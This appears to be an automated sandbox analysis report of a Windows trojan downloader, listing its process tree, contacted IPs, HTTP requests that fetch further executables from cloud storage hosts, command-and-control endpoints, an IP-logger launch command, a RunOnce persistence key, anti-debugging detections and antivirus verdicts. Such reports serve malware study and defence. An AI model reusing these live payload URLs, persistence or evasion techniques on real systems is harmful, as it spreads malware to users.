Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Dec. 12, 2022, 9:39 a.m. | Dec. 12, 2022, 9:43 a.m. |
-
-
CR3.tmp "C:\Users\test22\AppData\Local\Temp\is-E7HTF.tmp\CR3.tmp" /SL5="$30028,140518,56832,C:\Users\test22\AppData\Local\Temp\CR3.exe"
2112-
-
-
poweroff.tmp "C:\Users\test22\AppData\Local\Temp\is-ERPDQ.tmp\poweroff.tmp" /SL5="$50024,490199,350720,C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe" /VERYSILENT
2956-
Power Off.exe "C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu
2076
-
-
-
Cixydusuno.exe "C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe"
3000-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
2480-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145409
2696
-
-
-
Tenukaeqaefe.exe "C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe"
3036 -
-
-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2368 CREDAT:145409
2792
-
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
IP Address | Status | Action |
---|---|---|
148.251.234.93 | Active | Moloch |
151.115.10.1 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.217.161.36 | Active | Moloch |
172.217.31.14 | Active | Moloch |
173.233.137.44 | Active | Moloch |
23.43.165.105 | Active | Moloch |
37.230.138.123 | Active | Moloch |
37.230.138.66 | Active | Moloch |
52.219.171.106 | Active | Moloch |
95.214.24.96 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49168 52.219.171.106:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.eu-central-1.amazonaws.com | bc:92:6b:62:48:5f:c5:08:60:03:a9:1e:bc:29:58:79:d7:4b:94:fb |
TLS 1.2 192.168.56.103:49169 151.115.10.1:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=s3.pl-waw.scw.cloud | 13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd |
TLS 1.2 192.168.56.103:49170 151.115.10.1:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=s3.pl-waw.scw.cloud | 13:5a:26:76:9b:02:b0:88:8d:ed:ac:89:e9:f3:d1:bd:f4:6d:ff:fd |
TLSv1 192.168.56.103:49166 37.230.138.123:443 |
C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLSv1 192.168.56.103:49226 173.233.137.44:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | 6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99 |
TLSv1 192.168.56.103:49196 37.230.138.123:443 |
C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLSv1 192.168.56.103:49220 37.230.138.123:443 |
C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | a9:58:92:78:d9:50:a8:fa:c0:a9:d2:11:99:c2:6d:53:0e:1f:6d:49 |
TLSv1 192.168.56.103:49225 173.233.137.44:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=profitabletrustednetwork.com | 6a:48:45:b5:44:ae:75:f4:d2:b3:d4:5e:bc:2f:61:30:ec:d4:3a:99 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
section | CODE |
section | DATA |
section | BSS |
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.google.com/ | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST https://connectini.net/Series/SuperNitouDisc.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/pub-nv5fyed7t8r9ykva.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/hand-h6vuy332pnrr8zq9.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/up-da-nv5fyed7t8r9ykva.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://droplex.s3.pl-waw.scw.cloud/widgets/powerOff.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/S2S/Disc/Disc.php?ezok=pwoffch2&tesla=7 | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST https://connectini.net/Series/Conumer4Publisher.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/Series/publisher/1/KR.json | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST https://connectini.net/Series/Conumer2kenpachi.php | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/Series/configPoduct/2/goodchannel.json | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_mp3studioWW | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_file2Ww | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_PegasunWW |
request | HEAD http://chainsaw-man.s3.pl-waw.scw.cloud/costa-ins/poweroff.exe |
request | GET http://chainsaw-man.s3.pl-waw.scw.cloud/costa-ins/poweroff.exe |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies |
request | GET http://www.google.com/ |
request | POST https://connectini.net/Series/SuperNitouDisc.php |
request | GET https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe |
request | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/pub-nv5fyed7t8r9ykva.exe |
request | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/hand-h6vuy332pnrr8zq9.exe |
request | GET https://droplex.s3.pl-waw.scw.cloud/hadhi_3icha/up-da-nv5fyed7t8r9ykva.exe |
request | GET https://droplex.s3.pl-waw.scw.cloud/widgets/powerOff.exe |
request | GET https://connectini.net/S2S/Disc/Disc.php?ezok=pwoffch2&tesla=7 |
request | POST https://connectini.net/Series/Conumer4Publisher.php |
request | GET https://connectini.net/Series/publisher/1/KR.json |
request | POST https://connectini.net/Series/Conumer2kenpachi.php |
request | GET https://connectini.net/Series/kenpachi/2/goodchannel/KR.json |
request | GET https://connectini.net/Series/configPoduct/2/goodchannel.json |
request | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_mp3studioWW |
request | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_file2Ww |
request | GET https://connectini.net/ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_PegasunWW |
request | POST http://360devtracking.com/ezzcbmueaa4iwhvb/fmovies |
request | POST https://connectini.net/Series/SuperNitouDisc.php |
request | POST https://connectini.net/Series/Conumer4Publisher.php |
request | POST https://connectini.net/Series/Conumer2kenpachi.php |
description | Cixydusuno.exe tried to sleep 129 seconds, actually delayed analysis time by 129 seconds |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\zizou.exe |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\powerOff.lnk |
file | C:\Users\Public\Desktop\powerOff.lnk |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\idp.dll |
file | C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe |
file | C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe |
file | C:\Program Files (x86)\Google\SHesypalori.exe |
file | C:\Users\test22\AppData\Local\Temp\is-HQVUQ.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\powerOff.lnk |
file | C:\Users\Public\Desktop\powerOff.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1bDHA4.jpg |
file | C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe |
file | C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe |
file | C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe |
file | C:\Users\test22\AppData\Local\Temp\is-ERPDQ.tmp\poweroff.tmp |
file | C:\Users\test22\AppData\Local\Temp\ba-b2258-594-d99be-c73a4e8edf7b0\Cixydusuno.exe |
file | C:\Users\test22\AppData\Local\Temp\12-cb453-02a-f619c-a985aaa955f37\Tenukaeqaefe.exe |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\idp.dll |
file | C:\Users\test22\AppData\Local\Temp\is-OAQ81.tmp\zizou.exe |
file | C:\Users\test22\AppData\Local\Temp\is-E7HTF.tmp\CR3.tmp |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 |
cmdline | C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe /VERYSILENT |
cmdline | C:\Program Files (x86)\Internet Explorer\iexplore.exe https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2368 CREDAT:145409 |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145409 |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome |
cmdline | "C:\Users\test22\AppData\Local\Temp\is-ERPDQ.tmp\poweroff.tmp" /SL5="$50024,490199,350720,C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe" /VERYSILENT |
cmdline | "C:\Program Files\Internet Explorer\TYXARZQJPU\poweroff.exe" /VERYSILENT |
host | 95.214.24.96 |
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover | reg_value | "C:\Program Files (x86)\Google\SHesypalori.exe" |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob |
process | CR3.tmp | useragent | InnoDownloadPlugin/1.5 | ||||||
process | iexplore.exe | useragent | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) |
cmdline | "C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu |
Bkav | W32.AIDetect.malware2 |
Lionic | Riskware.Win32.Babar.1!c |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 99) |
McAfee | RDN/Generic.dx |
Malwarebytes | Trojan.Dropper |
VIPRE | Gen:Variant.Babar.125028 |
Sangfor | Downloader.Msil.Agent.Vmvb |
Alibaba | TrojanDownloader:MSIL/Generic.187546cc |
Cybereason | malicious.278bea |
Cyren | W32/ABRisk.BYET-4883 |
Symantec | Trojan.Gen.MBT |
APEX | Malicious |
Kaspersky | Trojan-Downloader.MSIL.Csdi.fg |
BitDefender | Gen:Variant.Babar.125028 |
MicroWorld-eScan | Gen:Variant.Babar.125028 |
Avast | FileRepMalware [Misc] |
Ad-Aware | Gen:Variant.Babar.125028 |
Emsisoft | Gen:Variant.Babar.125028 (B) |
TrendMicro | Trojan.Win32.PRIVATELOADER.YXCLKZ |
McAfee-GW-Edition | BehavesLike.Win32.AdwareFileTour.fc |
FireEye | Gen:Variant.Babar.125028 |
Sophos | Mal/Generic-S (PUA) |
GData | Gen:Variant.Babar.125028 |
Avira | HEUR/AGEN.1233171 |
Kingsoft | Win32.TrojDownloader.MSIL.fg.(kcloud) |
Gridinsoft | Malware.Win32.Phonzy.cl |
Arcabit | Trojan.Babar.D1E864 |
ZoneAlarm | Trojan-Downloader.MSIL.Csdi.fg |
Microsoft | Trojan:Script/Phonzy.A!ml |
Detected | |
AhnLab-V3 | Malware/Win.Generic.C5190104 |
ALYac | Gen:Variant.Babar.125028 |
MAX | malware (ai score=83) |
Cylance | Unsafe |
TrendMicro-HouseCall | Trojan.Win32.PRIVATELOADER.YXCLKZ |
Tencent | Msil.Trojan-Downloader.Csdi.Dwnw |
Fortinet | W32/PossibleThreat |
AVG | FileRepMalware [Misc] |